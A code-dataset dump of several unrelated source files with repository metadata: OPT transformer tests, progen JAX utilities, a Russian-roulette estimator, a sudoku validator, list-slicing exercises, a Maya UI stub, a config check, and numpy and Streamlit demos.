wte = model.get_input_embeddings()
if not self.is_encoder_decoder:
inputs["inputs_embeds"] = wte(input_ids)
else:
inputs["inputs_embeds"] = wte(encoder_input_ids)
inputs["decoder_inputs_embeds"] = wte(decoder_input_ids)
with torch.no_grad():
model(**inputs)[0]
def test_generate_fp16(self):
config, input_dict = self.model_tester.prepare_config_and_inputs()
input_ids = input_dict["input_ids"]
attention_mask = input_ids.ne(1).to(torch_device)
model = OPTForCausalLM(config).eval().to(torch_device)
if torch_device == "cuda":
model.half()
model.generate(input_ids, attention_mask=attention_mask)
model.generate(num_beams=4, do_sample=True, early_stopping=False, num_return_sequences=3)
def assert_tensors_close(a, b, atol=1e-12, prefix=""):
"""If tensors have different shapes, different values or a and b are not both tensors, raise a nice Assertion error."""
if a is None and b is None:
return True
try:
if torch.allclose(a, b, atol=atol):
return True
raise
except Exception:
pct_different = (torch.gt((a - b).abs(), atol)).float().mean().item()
if a.numel() > 100:
msg = f"tensor values are {pct_different:.1%} percent different."
else:
msg = f"{a} != {b}"
if prefix:
msg = prefix + ": " + msg
raise AssertionError(msg)
def _long_tensor(tok_lst):
return torch.tensor(tok_lst, dtype=torch.long, device=torch_device)
@require_torch
class OPTModelIntegrationTests(unittest.TestCase):
@slow
def test_inference_no_head(self):
model = OPTModel.from_pretrained("facebook/opt-350m").to(torch_device)
input_ids = _long_tensor([[0, 31414, 232, 328, 740, 1140, 12695, 69, 46078, 1588, 2]])
with torch.no_grad():
output = model(input_ids=input_ids).last_hidden_state
expected_shape = torch.Size((1, 11, 512))
self.assertEqual(output.shape, expected_shape)
# expected value works for CPU, as well as GPU (with TF32 disabled)
expected_slice = torch.tensor(
[
[-0.28726277, -1.9241608, -0.3058734],
[-1.2737825, -0.13332152, -0.18766522],
[0.41159445, 0.1191957, -1.3107123],
],
device=torch_device,
)
assert_tensors_close(output[0, :3, :3], expected_slice, atol=5e-5)
@require_torch
@slow
class OPTEmbeddingsTest(unittest.TestCase):
def setUp(self):
super().setUp()
self.path_model = "facebook/opt-350m"
def test_load_model(self):
try:
_ = OPTForCausalLM.from_pretrained(self.path_model)
except BaseException:
self.fail("Failed loading model")
def test_logits(self):
model = OPTForCausalLM.from_pretrained(self.path_model)
model = model.eval()
tokenizer = GPT2Tokenizer.from_pretrained(self.path_model)
prompts = [
"Today is a beautiful day and I want to",
"In the city of",
"Paris is the capital of France and",
"Computers and mobile phones have taken",
]
# verify that prompt without BOS token is identical to Metaseq -> add_special_tokens=False
inputs = tokenizer(prompts, return_tensors="pt", padding=True, add_special_tokens=False)
logits = model(inputs.input_ids, attention_mask=inputs.attention_mask)[0].mean(dim=-1)
# logits_meta = torch.load(self.path_logits_meta)
logits_meta = torch.Tensor(
[
[1.3851, -13.8923, -10.5229, -10.7533, -0.2309, -10.2384, -0.5365, -9.0947, -5.1670],
[-4.7073, -10.6276, -3.9415, -21.5242, -0.2822, -0.2822, -0.2822, -0.2822, -0.2822],
[0.6247, -3.4229, -8.9179, -1.4297, -14.1650, 1.4146, -9.0218, -0.2703, -0.2703],
[6.4783, -1.9913, -10.7926, -2.3336, 1.5092, -0.9974, -6.8213, 1.3477, 1.3477],
]
)
assert torch.allclose(logits, logits_meta, atol=1e-4)
@slow
class OPTGenerationTest(unittest.TestCase):
@property
def prompts(self):
return [
"Today is a beautiful day and I want",
"In the city of",
"Paris is the capital of France and",
"Computers and mobile phones have taken",
]
def test_generation_pre_attn_layer_norm(self):
model_id = "facebook/opt-125m"
EXPECTED_OUTPUTS = [
"Today is a beautiful day and I want to",
"In the city of New York, the city",
"Paris is the capital of France and the capital",
"Computers and mobile phones have taken over the",
]
predicted_outputs = []
tokenizer = GPT2Tokenizer.from_pretrained(model_id)
model = OPTForCausalLM.from_pretrained(model_id)
for prompt in self.prompts:
input_ids = tokenizer(prompt, return_tensors="pt").input_ids
generated_ids = model.generate(input_ids, max_length=10)
generated_string = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)
predicted_outputs += generated_string
self.assertListEqual(predicted_outputs, EXPECTED_OUTPUTS)
def test_batch_generation(self):
model_id = "facebook/opt-350m"
tokenizer = GPT2Tokenizer.from_pretrained(model_id)
model = OPTForCausalLM.from_pretrained(model_id)
model.to(torch_device)
tokenizer.padding_side = "left"
# use different length sentences to test batching
sentences = [
"Hello, my dog is a little",
"Today, I",
]
inputs = tokenizer(sentences, return_tensors="pt", padding=True)
input_ids = inputs["input_ids"].to(torch_device)
outputs = model.generate(
input_ids=input_ids,
attention_mask=inputs["attention_mask"].to(torch_device),
)
inputs_non_padded = tokenizer(sentences[0], return_tensors="pt").input_ids.to(torch_device)
output_non_padded = model.generate(input_ids=inputs_non_padded)
num_paddings = inputs_non_padded.shape[-1] - inputs["attention_mask"][-1].long().sum().cpu().item()
inputs_padded = tokenizer(sentences[1], return_tensors="pt").input_ids.to(torch_device)
output_padded = model.generate(input_ids=inputs_padded, max_length=model.config.max_length - num_paddings)
batch_out_sentence = tokenizer.batch_decode(outputs, skip_special_tokens=True)
non_padded_sentence = tokenizer.decode(output_non_padded[0], skip_special_tokens=True)
padded_sentence = tokenizer.decode(output_padded[0], skip_special_tokens=True)
expected_output_sentence = [
"Hello, my dog is a little bit of a dork.\nI'm a little bit",
"Today, I was in the middle of a conversation with a friend about the",
]
self.assertListEqual(expected_output_sentence, batch_out_sentence)
self.assertListEqual(batch_out_sentence, [non_padded_sentence, padded_sentence])
def test_generation_post_attn_layer_norm(self):
model_id = "facebook/opt-350m"
EXPECTED_OUTPUTS = [
"Today is a beautiful day and I want to",
"In the city of San Francisco, the city",
"Paris is the capital of France and the capital",
"Computers and mobile phones have taken over the",
]
predicted_outputs = []
tokenizer = GPT2Tokenizer.from_pretrained(model_id)
model = OPTForCausalLM.from_pretrained(model_id)
for prompt in self.prompts:
input_ids = tokenizer(prompt, return_tensors="pt").input_ids
generated_ids = model.generate(input_ids, max_length=10)
generated_string = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)
predicted_outputs += generated_string
self.assertListEqual(predicted_outputs, EXPECTED_OUTPUTS)
@require_torch_gpu
def test_batched_nan_fp16(self):
# a bug manifested starting at models facebook/opt-1.3b and larger when running batched generations,
# therefore not using a tiny model, but the smallest model the problem was seen with which is opt-1.3b.
# please refer to this github thread: https://github.com/huggingface/transformers/pull/17437 for more details
model_name = "facebook/opt-1.3b"
tokenizer = GPT2Tokenizer.from_pretrained(model_name, use_fast=False, padding_side="left")
model = OPTForCausalLM.from_pretrained(model_name, torch_dtype=torch.float16, use_cache=True).cuda()
model = model.eval()
batch = tokenizer(["Who are you?", "Joe Biden is the president of"], padding=True, return_tensors="pt")
input_ids = batch["input_ids"].cuda()
attention_mask = batch["attention_mask"].cuda()
with torch.no_grad():
outputs = model(input_ids, attention_mask=attention_mask)
self.assertFalse(
torch.isnan(outputs.logits[0]).any().item()
) # the first logits could contain NaNs if it fails
| [
"[email protected]"
] | |
a753eac93c08765a0bdfa2dc047e3540b4c795b6 | d7a73fdc2fa60a171d1b3ed3bbefe863c9351fab | /progen_transformer/utils.py | 985f3b5fa667b37073c055c4d1b1786ddb90b702 | [
"MIT"
] | permissive | sailfish009/progen | e584d7352d8f89c7d72992c222ca888db7f28495 | 131320c67ed831aa812e58a4995d3414e458640f | refs/heads/main | 2023-06-07T12:49:09.742045 | 2021-07-04T00:06:59 | 2021-07-04T00:06:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,477 | py | import os, errno
from shutil import rmtree
from jax import random, nn, value_and_grad, vmap, pmap, jit, lax
from jax.lax import top_k
import jax.numpy as np
# helper functions
def exists(val):
return val is not None
def log(t, eps = 1e-20):
return np.log(t + eps)
def confirm(question):
while True:
resp = input(f'{question} (y/n) ')
lower_resp = resp.lower()
if lower_resp in ('y', 'n'):
return lower_resp == 'y'
def clear_directory_(path):
rmtree(str(path), ignore_errors = True)
path.mkdir(exist_ok = True, parents = True)
def silentremove(filename):
try:
os.remove(filename)
except OSError:
pass
# training functions
def cross_entropy(logits, targets, axis = -1, ignore_index = 0):
logprobs = nn.log_softmax(logits, axis = axis)
nll = np.take_along_axis(logprobs, np.expand_dims(targets, axis = axis), axis = axis)
# mask for loss is engineered so that it learns from the first padding token
# the padding token is reused as end-of-string for simplicity
mask = (targets != ignore_index)
eos_mask = (~mask).cumsum(axis = -1) == 1
mask = mask | eos_mask
ce = -np.mean(nll[mask])
return ce
def get_train_loss_fn(model, data_parallel = False):
map_fn = pmap if data_parallel else vmap
batch_model_apply = jit(map_fn(model.apply, in_axes = (None, None, 0), out_axes = 0))
@value_and_grad
def loss_fn(params, key, data):
inp, labels = data[:, :-1], data[:, 1:]
logits = batch_model_apply(params, key, inp)
return cross_entropy(logits, labels, axis = -1)
return loss_fn
# sampling functions
def select_top_k(tensor, k):
values, _ = top_k(tensor, k)
mask = tensor > values.min()
return mask, np.where(mask, tensor, 0.)
def gumbel_noise(rng, shape):
noise = random.uniform(rng, shape = shape, minval = 0., maxval = 1.)
return -log(-log(noise))
def sample(rng, fn, params, prime, length, top_k = None, add_bos = False):
start_pos = prime.shape[-1]
pad_right = length - prime.shape[-1]
padding = (0, pad_right) if not add_bos else (1, pad_right - 1)
seq = np.pad(prime, padding)
one_hots = np.eye(length, dtype = int)
for curr_pos in range(start_pos, length):
logits = fn(params, next(rng), seq)
logits = logits[curr_pos - 1]
noise = gumbel_noise(next(rng), logits.shape)
if exists(top_k):
mask, logits = select_top_k(logits, top_k)
noise *= mask
logits += noise
sampled_ind = np.argmax(logits, axis = -1)
one_hot = one_hots[curr_pos]
seq += one_hot * sampled_ind
# for now, just set everything after second padding token (eos) to padding
remove_after_eos_mask = (seq == 0).cumsum(axis = -1) > 1
seq *= ~remove_after_eos_mask
return seq
# rng hacks
def hardware_uniform(
rng_key,
shape,
dtype = np.float32,
minval = np.float32(0),
maxval = np.float32(1)
):
del rng_key
minval = lax.convert_element_type(minval, dtype)
maxval = lax.convert_element_type(maxval, dtype)
return lax.rng_uniform(minval, maxval, shape)
def hardware_bernoulli(rng_key, p = np.float32(0.5), shape = None):
del rng_key
return lax.rng_uniform(0.0, 1.0, shape) < p
def set_hardware_rng_(jax):
jax.random.bernoulli = hardware_bernoulli
jax.random.uniform = hardware_uniform
jax._src.random.uniform = hardware_uniform
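# Note: swapping JAX's counter-based RNG for lax.rng_uniform (the raw hardware
# RNG) is a common speed hack on accelerators -- the PRNG keys are discarded
# (`del rng_key`), so results are no longer reproducible across runs.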
| [
"[email protected]"
] | |
09f225cdf22472b45c1d1f9d140bd0d5ee2c897f | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Scripts/Lazymux/routersploit/routersploit/modules/creds/cameras/honeywell/ssh_default_creds.py | 6477710e7ac7b6aa711f719e0a907bb616b6175d | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:39364c7930721e7cc70c7da8107affc5b3e0356146825b0ee4d41d5a6b47b20f
size 858
| [
"[email protected]"
] | |
6d4d9a6b5cf7732ea1bdc9a1514340ec7eafad4d | 0a9e72d2527a2d82086b8c56ef23c9e9903e3da3 | /russian_roulette/RussianRoulette.py | d0c2ba3861197b9d51598f15d79a22c7e5a55170 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] | permissive | karlnapf/ozone-roulette | 6bfcab10dee8b9dd95833bd15c1a3702c2f9769e | df99b11c3b00a27440b094427d485b2fea858903 | refs/heads/master | 2021-01-01T05:30:21.389668 | 2015-02-03T09:09:40 | 2015-02-03T09:10:01 | 12,896,509 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,664 | py |
from abc import abstractmethod
from numpy.lib.function_base import delete
from numpy.ma.core import mean, zeros, log, arange, std
from numpy.random import permutation, rand
import logging
class RussianRoulette(object):
def __init__(self, threshold, block_size=1):
self.threshold = threshold
self.block_size = block_size
@abstractmethod
def get_estimate(self, estimates, index):
start_idx = index * self.block_size
stop_idx = index * self.block_size + self.block_size
# if there are enough samples, use them, sub-sample if not
if stop_idx <= len(estimates):
logging.debug("Averaging over %d samples from index %d to %d" %
(self.block_size, start_idx, stop_idx))
indices = arange(start_idx, stop_idx)
else:
logging.debug("Averaging over a random subset of %d samples" %
self.block_size)
indices = permutation(len(estimates))[:self.block_size]
return mean(estimates[indices])
def exponential(self, estimates):
logging.debug("Entering")
# find a lower bound on the estimates and remove it from the list
bound = estimates.min()
bound_idx = estimates.argmin()
estimates = delete(estimates, bound_idx)
estimates = estimates - bound
# find an integer close to the mean of the transformed estimates and divide
E = max(int(round(abs(mean(estimates)))), 1)
estimates = estimates / E
logging.info("Using %f as lower bound on estimates" % bound)
logging.info("Computing product of E=%d RR estimates" % E)
logging.info("Std-deviation after scaling is %f" % std(estimates))
# index for iterating through the used estimates
# (might be averaged, so might be lower than the number of available estimates
# if the block size is greater than one
estimate_idx = 0
samples = zeros(E)
for iteration in range(E):
weight = 1
# start with x^0 which is 1
samples[iteration] = 1
term = 1
# index for computed samples
series_term_idx = 1
while weight > 0:
# update current term of infinite series
# average over block
x_inner = self.get_estimate(estimates, estimate_idx)
term *= (x_inner / series_term_idx)
# if summation has reached threshold, update weights
if abs(term) < self.threshold:
q = term / self.threshold
if rand() < q:
# continue and update weight
weight = weight / q
else:
# stop summation
weight = 0
samples[iteration] += weight * term
estimate_idx += 1
series_term_idx += 1
logging.info("RR estimate %d/%d with threshold %.2f is %.4f and took %d series terms" %
(iteration + 1, E, self.threshold, samples[iteration], series_term_idx))
# now put things together. Note that samples contains an unbiased estimate
# which might be quite small. However, due to the removal of the bound,
# this will not cause an underflow and we can just take the log.
logging.debug("Leaving")
return bound + sum(log(samples))
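if __name__ == "__main__":
    # Minimal usage sketch under made-up numbers: the inputs are unbiased
    # estimates of some quantity, and exponential() returns a single
    # Russian-Roulette estimate built from a randomly truncated series.
    from numpy.random import randn
    rr = RussianRoulette(threshold=0.01, block_size=10)
    print(rr.exponential(2.0 + 0.1 * randn(5000)))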
| [
"[email protected]"
] | |
4f58fdd8fecd723dc0c3f7a5d4aab0f22eb56328 | 64e498b6b6cd6a2cf6855331d66d81b51ee1cdde | /src/bug/relationchoice/__init__.py | b98663e38b15b4eb0d52192e1440e558a938d1c9 | [] | no_license | nutjob4life/bug.relationchoice | 8d3d4c6223bf70d1b8b9e8fe639bfb89168ca748 | 26bf0d968c7f86e19ea36025d930fc01519c5390 | refs/heads/master | 2020-05-18T04:53:59.892557 | 2014-12-18T19:42:42 | 2014-12-18T19:42:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 44 | py | # encoding: utf-8
'''bug.relationchoice'''
| [
"[email protected]"
] | |
5e392dbeec98a689c52d64e02a4d0985d70efdef | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/matrix/sudoku_validator.py | 7bda6e4241502010a2301498fe39b6c447b205d9 | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,478 | py | """
Write a function validSolution/ValidateSolution/valid_solution() that accepts a 2D array representing a Sudoku board, and returns true if it is a valid solution, or false otherwise. The cells of the sudoku board may also contain 0's, which will represent empty cells. Boards containing one or more zeroes are considered to be invalid solutions.
The board is always 9 cells by 9 cells, and every cell only contains integers from 0 to 9.
(More info at: http://en.wikipedia.org/wiki/Sudoku)
"""
# Using dict/hash-table
from collections import defaultdict
def valid_solution_hashtable(board):
for i in range(len(board)):
dict_row = defaultdict(int)
dict_col = defaultdict(int)
for j in range(len(board[0])):
value_row = board[i][j]
value_col = board[j][i]
            if value_row == 0 or value_col == 0:
return False
if value_row in dict_row:
return False
else:
dict_row[value_row] += 1
if value_col in dict_col:
return False
else:
dict_col[value_col] += 1
    # each 3x3 box must contain nine distinct values; checking only that a box
    # sums to 45 would wrongly accept boxes with repeated digits
    for i in range(3):
        for j in range(3):
            seen = defaultdict(int)
            for k in range(3):
                for l in range(3):
                    value = board[i*3+k][j*3+l]
                    if seen[value]:
                        return False
                    seen[value] += 1
return True
# Without hash-table/dict
def valid_solution(board):
correct = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# check rows
for row in board:
if sorted(row) != correct:
return False
# check columns
for column in zip(*board):
if sorted(column) != correct:
return False
# check regions
for i in range(3):
for j in range(3):
region = []
for line in board[i*3:(i+1)*3]:
region += line[j*3:(j+1)*3]
if sorted(region) != correct:
return False
# if everything correct
return True
# Using set
def valid_solution_set(board):
valid = set(range(1, 10))
for row in board:
if set(row) != valid:
return False
for col in [[row[i] for row in board] for i in range(9)]:
if set(col) != valid:
return False
for x in range(3):
for y in range(3):
if set(sum([row[x*3:(x+1)*3] for row in board[y*3:(y+1)*3]], [])) != valid:
return False
return True
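# Quick self-check with a hand-verified valid solution (the board itself is an
# illustrative addition, not part of the original exercise): all three
# validators should agree on it.
if __name__ == "__main__":
    solved = [
        [5, 3, 4, 6, 7, 8, 9, 1, 2],
        [6, 7, 2, 1, 9, 5, 3, 4, 8],
        [1, 9, 8, 3, 4, 2, 5, 6, 7],
        [8, 5, 9, 7, 6, 1, 4, 2, 3],
        [4, 2, 6, 8, 5, 3, 7, 9, 1],
        [7, 1, 3, 9, 2, 4, 8, 5, 6],
        [9, 6, 1, 5, 3, 7, 2, 8, 4],
        [2, 8, 7, 4, 1, 9, 6, 3, 5],
        [3, 4, 5, 2, 8, 6, 1, 7, 9],
    ]
    assert valid_solution_hashtable(solved)
    assert valid_solution(solved)
    assert valid_solution_set(solved)
    print("all three validators accept the solved board")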
| [
"[email protected]"
] | |
542a65e7cf0987e43c313ec125817c182f6c4308 | e66eb0234d09b732b52c839058a830bee486fd30 | /list_operations.py | 6e136a5fe261e154cc5ab0633b4d3bcc537ce7b0 | [] | no_license | nt-git/list-slicing | 44d10c350b0e0248cfcc18cf795bab07bb5f4a5b | 5f8a8290a4b040bef1ddbfe7b6e559a46d01f67e | refs/heads/master | 2021-05-14T13:08:26.640954 | 2018-01-05T21:08:11 | 2018-01-05T21:08:11 | 116,427,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,306 | py | """Functions that manipulate lists without using Python's built-in list methods.
The fundamental operations on lists in Python are those that are part of the
language syntax and/or cannot be implemented in terms of other list operations.
They include:
* List indexing (some_list[index])
* List indexing assignment (some_list[index] = value)
* List slicing (some_list[start:end])
* List slicing assignment (some_list[start:end] = another_list)
* List index deletion (del some_list[index])
* List slicing deletion (del some_list[start:end])
Implement functions that each use just one of the above operations.
The docstring of each function describes what it should do.
DO NOT USE ANY OF THE BUILT IN LIST METHODS, OR len()!
"""
def head(input_list):
"""Return the first element of the input list.
For example:
>>> head(['Jan', 'Feb', 'Mar'])
'Jan'
"""
return input_list[0]
def tail(input_list):
"""Return all elements of the input list except the first.
For example:
>>> tail(['Jan', 'Feb', 'Mar'])
['Feb', 'Mar']
"""
return input_list[1:]
def last(input_list):
"""Return the last element of the input list.
For example:
>>> last(['Jan', 'Feb', 'Mar'])
'Mar'
"""
return input_list[-1]
def init(input_list):
"""Return all elements of the input list except the last.
For example:
>>> init(['Jan', 'Feb', 'Mar'])
['Jan', 'Feb']
"""
return input_list[:-1]
##############################################################################
# Do yourself a favor and get a short code review here.
def first_three(input_list):
"""Return the first three elements of the input list.
For example:
>>> first_three(['Jan', 'Feb', 'Mar', 'Apr', 'May'])
['Jan', 'Feb', 'Mar']
"""
return input_list[0:3]
def last_five(input_list):
"""Return the last five elements of the input list.
For example:
>>> last_five([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[15, 18, 21, 24, 27]
"""
return input_list[-5:]
def middle(input_list):
"""Return all elements of input_list except the first two and the last two.
For example:
>>> middle([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15, 18, 21]
"""
return input_list[2:-2]
def inner_four(input_list):
"""Return the third, fourth, fifth, and sixth elements of input_list.
For example:
>>> inner_four([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15]
"""
return input_list[2:6]
def inner_four_end(input_list):
"""Return the elements that are 6th, 5th, 4th, and 3rd from the end of input_list.
This function should return those elements in a list, in the exact order
described above.
For example:
>>> inner_four_end([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[12, 15, 18, 21]
"""
return input_list[-6:-2]
def replace_head(input_list):
"""Replace the head of input_list with the value 42 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_head(multiples)
>>> multiples == [42, 3, 6, 9, 12, 15, 18, 21, 24, 27]
True
"""
input_list[0] = 42
return
def replace_third_and_last(input_list):
"""Replace third and last elements of input_list with 37 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_third_and_last(multiples)
>>> multiples == [0, 3, 37, 9, 12, 15, 18, 21, 24, 37]
True
"""
input_list[2] = 37
input_list[-1] = 37
return
def replace_middle(input_list):
"""Replace all elements of a list but the first and last two with 42 and 37.
After the replacement, 42 and 37 should appear in that order in input_list.
Return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_middle(multiples)
>>> multiples == [0, 3, 42, 37, 24, 27]
True
"""
input_list[2:-2] = [42, 37]
return
def delete_third_and_seventh(input_list):
"""Remove third and seventh elements of input_list and return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_third_and_seventh(notes)
>>> notes == ['Do', 'Re', 'Fa', 'So', 'La', 'Do']
True
"""
del input_list[2]
del input_list[5]
return
def delete_middle(input_list):
"""Remove all elements from input_list except the first two and last two.
Return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_middle(notes)
>>> notes == ['Do', 'Re', 'Ti', 'Do']
True
"""
    del input_list[2:-2]
    return
##############################################################################
# END OF MAIN EXERCISE. Yay! You did it! You Rock!
#
# Please ask for a code review from an Education team member before proceeding.
##############################################################################
# This is the part were we actually run the doctests.
if __name__ == "__main__":
import doctest
result = doctest.testmod()
if result.failed == 0:
print "ALL TESTS PASSED"
| [
"[email protected]"
] | |
5e10aabc613ae7de645ef94312a9a1bc985b98cf | aa0366a8632f334fb35e6bdc78717f3456202eb7 | /bp/characterKit.py | 21b2ade02cf6076383350c1d725ab0a82e74ea12 | [] | no_license | Mortaciunea/bdScripts | 0891478096f3a5876655896c9649c0a7204d5ee8 | 4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59 | refs/heads/master | 2020-12-24T13:36:57.930038 | 2015-09-03T16:03:46 | 2015-09-03T16:03:46 | 41,869,547 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,057 | py | import pymel.core as pm
import pymel.core.datatypes as dt
import re,os,shutil,glob
import logging
import shiboken
import PySide.QtGui as QtGui
import PySide.QtCore as QtCore
import maya.OpenMayaUI
def get_maya_window():
maya_window_util = maya.OpenMayaUI.MQtUtil.mainWindow()
maya_window = shiboken.wrapInstance( long( maya_window_util ), QtGui.QWidget )
return maya_window
characterKitWin = 'characterKitWindow'
class CharacterKitUI(QtGui.QMainWindow):
    def __init__(self, parent=None):
        # resolve the parent window at call time; evaluating get_maya_window() in
        # the signature would run once at import, possibly before Maya's UI exists
        if parent is None:
            parent = get_maya_window()
        if pm.window(characterKitWin, exists=True, q=True):
            pm.deleteUI(characterKitWin)
super(CharacterKitUI,self).__init__(parent)
self.setObjectName(characterKitWin)
self.setWindowTitle('Character Kit 2.1')
centralWidget = QtGui.QWidget()
mainLayout = QtGui.QVBoxLayout()
leftSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Vertical)
rightSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
#left side lists
#characters list
self.charactersList = QtGui.QListView()
#skins list
self.skinsList = QtGui.QListView()
#body parts list
self.bodyPartsList = QtGui.QListView()
leftSideListsLSplitter.addWidget(self.charactersList)
leftSideListsLSplitter.addWidget(self.skinsList)
leftSideListsLSplitter.addWidget(self.bodyPartsList)
mainLayout.addWidget(leftSideListsLSplitter)
centralWidget.setLayout(mainLayout)
self.setCentralWidget(centralWidget)
#menu bar
self.addMenu()
self.show()
self.resize(860,600)
def addMenu(self):
self.menuBar = self.menuBar()
self.fileMenu = self.menuBar.addMenu('File')
self.fileMenu.addAction('Load skeleton')
self.fileMenu.addAction('Save skeleton')
self.toolsMenu = self.menuBar.addMenu('Tools')
self.toolsMenu.addAction('Create Picking Geometry')
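# Usage sketch (assumption: run inside a Maya session where PySide and shiboken
# are importable; nothing in this file launches the window itself):
#   win = CharacterKitUI()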
| [
"[email protected]"
] | |
400ddf4c1c830f1adf3d42e1f2ef065c19735ef2 | b08b373d78fb42dbb11aebeadf71168dc6476696 | /pycharm_programs/mme-methods/henbgw_count.py | d84e97c0fedf37a1d818f56f5e2f6731fc524b0b | [] | no_license | lajapathy/python-practice | 40a44a026546d1f3414452a99a68487a14df3c02 | 869a59cad89077327bb8117c34801af985a63e0d | refs/heads/master | 2022-02-25T14:59:52.155959 | 2019-09-24T07:16:58 | 2019-09-24T07:16:58 | 121,089,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | import re
def henbgw_count(self):
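    # Compare the henbgw-mgmt-db name configured on each chassis ("show config")
    # against the name reported by "show lte-policy mme henbgw mgmt-db summary";
    # a mismatch is returned as a failing SystestResult.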
for chassis in self.get_dut_list():
config_lines = self._send(["show config"], chassis)
henbgw_mgmt_db_name_from_config = ''
henbgw_mgmt_db_name_from_cli_output = ''
for line in config_lines:
if "associate henbgw-mgmt-db" in line:
henbgw_mgmt_db_name_from_config = re.match('\s*associate henbgw-mgmt-db\s*(.*)\s*',line).group(1)
break
cli_output = self._send(["show lte-policy mme henbgw mgmt-db summary"], chassis)
for line in cli_output:
if "HenbGW Management DB" in line:
henbgw_mgmt_db_name_from_cli_output = re.match('\s*HenbGW Management DB\s*(.*)\s*',line).group(1)
break
if henbgw_mgmt_db_name_from_cli_output != henbgw_mgmt_db_name_from_config:
return SystestResult(1, henbgw_mgmt_db_name_from_cli_output)
#Now, we verify henbgw count
| [
"[email protected]"
] | |
0dc4c9fb7b5faa84b43a579fbd289c735ff7794f | 8fd92c0a65c9b3e3912b6e8ef043656ee225880a | /EXAMPLES/np_create_ranges.py | e1aa89ab7ab9a7f0785f17f77b6c152021baa25a | [] | no_license | waiteb15/py3forsci3day | 9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4 | fc664042618f0910d40e85677a2438eef5cce2b7 | refs/heads/master | 2020-04-25T11:24:18.697218 | 2019-02-28T23:40:52 | 2019-02-28T23:40:52 | 172,743,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | #!/usr/bin/env python
import numpy as np
r1 = np.arange(50)
print(r1)
print("size is", r1.size)
print()
r2 = np.arange(5, 101, 5)
print(r2)
print("size is", r2.size)
print()
r3 = np.arange(1.0, 5.0, 0.3333333)
print(r3)
print("size is", r3.size)
print()
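# note: with a float step, arange is subject to rounding at the endpoint and the
# sample count can surprise you; linspace (next) is the safer choice when an
# exact number of points is needed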
r4 = np.linspace(1.0, 5.0, 7)
print(r4)
print("size is", r4.size)
print() | [
"[email protected]"
] | |
ab6d591fb1096d67a92f1b2f9be58d471222ea9a | 37fef592f365194c28579f95abd222cc4e1243ae | /streamlit/book_recommender/Overview.py | 3a38ef090b172cb0a6ec3907446d749998ff6fca | [] | no_license | edimaudo/Python-projects | be61e0d3fff63fb7bd00513dbf1401e2c1822cfb | 85d54badf82a0b653587a02e99daf389df62e012 | refs/heads/master | 2023-04-07T03:26:23.259959 | 2023-03-24T12:03:03 | 2023-03-24T12:03:03 | 72,611,253 | 4 | 3 | null | 2022-10-31T18:10:41 | 2016-11-02T06:37:17 | null | UTF-8 | Python | false | false | 3,298 | py | #================
# Book Overview
#================
# Load libraries
import streamlit as st
import pandas as pd
import plotly.express as px
import os, os.path
st.title('Book Overview')
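# st.cache memoizes load_data, so each CSV is parsed only once per session
# (st.cache was the caching API current for this app; later Streamlit releases
# replace it with st.cache_data)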
@st.cache
def load_data(DATA_URL):
data = pd.read_csv(DATA_URL)
data.dropna(inplace=True)
return data
# Load data
books = load_data("BX-Books_clean.csv")
users = load_data("BX-Users_clean.csv")
ratings = load_data("BX-Book-Ratings_clean.csv")
#====================
# Raw data
#====================
st.subheader("Book data")
with st.expander("Open to see more",expanded=False):
st.dataframe(books)
st.subheader("Book Data Summary")
# AVERAGE RATING
average_rating = "{:.2f}".format(ratings['bookRating'].mean())
# AVERAGE AGE
average_age= "{:.2f}".format(users['Age'].mean())
# NUMBER OF USERS
number_of_users = users['userID'].count()
# NUMBER OF BOOKS
number_of_books = books['ISBN'].count()
# TOP 5 PUBLISHERS AND BOTTOM 5 PUBLISHERS
book_info = books.groupby(["publisher"]).size().reset_index(name='count')
book_info.columns = ['Publisher','Count']
book_info = book_info.sort_values("Count", ascending=False)
top_5_publishers = book_info.head(5)
bottom_5_publishers = book_info.tail(5)
